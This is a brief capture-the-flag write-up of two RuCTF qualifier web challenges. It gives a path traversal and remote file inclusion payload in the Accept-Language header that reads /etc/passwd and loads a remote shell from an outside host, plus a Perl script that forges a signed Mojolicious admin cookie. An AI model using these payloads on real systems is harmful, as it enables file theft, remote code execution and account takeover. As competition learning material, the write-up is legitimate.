Web100

Task give us a site with some text in it and a text at the bottom that inform us that the language is detected automatically. We immediatly thought about the Accept-Language HTTP that could hit this feature. Infact changing it to ‘Accept-Language: ../../../../etc/passwd;q=0.3’ will lead us to the content of /etc/passwd. But that wasn’t the real vulnerability. We can do also RFI on this and executing our remote shell:

GET http://w1.quals.ructf.org/?x=cat%20index.php

Accept-Language: q=0.5,http://nurfed.madoka.be/test/shell.txt?

$flag = '5cf27d9bad2fe9d96d2bcf25c3b0bd14';

Web200

The challenge is about logging into admin in this tiny application. Once you logged the app set you a cookie called ‘mojolicious’ which is composed by a JSON object base64 encoded plus some ‘-’ and MD5. Googling what is ‘mojolicious’ it pointed out that its a Perl techonology. The JSON object holds the credentials of the logged user, so for login as admin we just need to modify the username field with ‘admin’. But there’s is a problem that the cookie must be signed in the right way and we do this just by calculating the HMAC SHA1 hash of the base64 encoded payload containing the admin status using ‘ructf’ as key (hinted in the html source of the page). Then just replace the site’s cookie with the crafted one and get the flag:

#!/bin/perl
#jflag: 054ad7a734437d6853383ad919526dc5
use Mojo::Util qw/hmac_sha1_sum b64_decode b64_encode/;
$s = b64_decode 'eyJuYW1lIjoiYXNkIiwiZXhwaXJlcyI6MTM5NDMyMTE3M30';
$s=~s/asd/admin/;
$aa = b64_encode($s, '');
$aa =~ s/=/-/g;
my $firm = hmac_sha1_sum $aa, 'ructf';
print $aa."--".$firm."\n";

Razor4x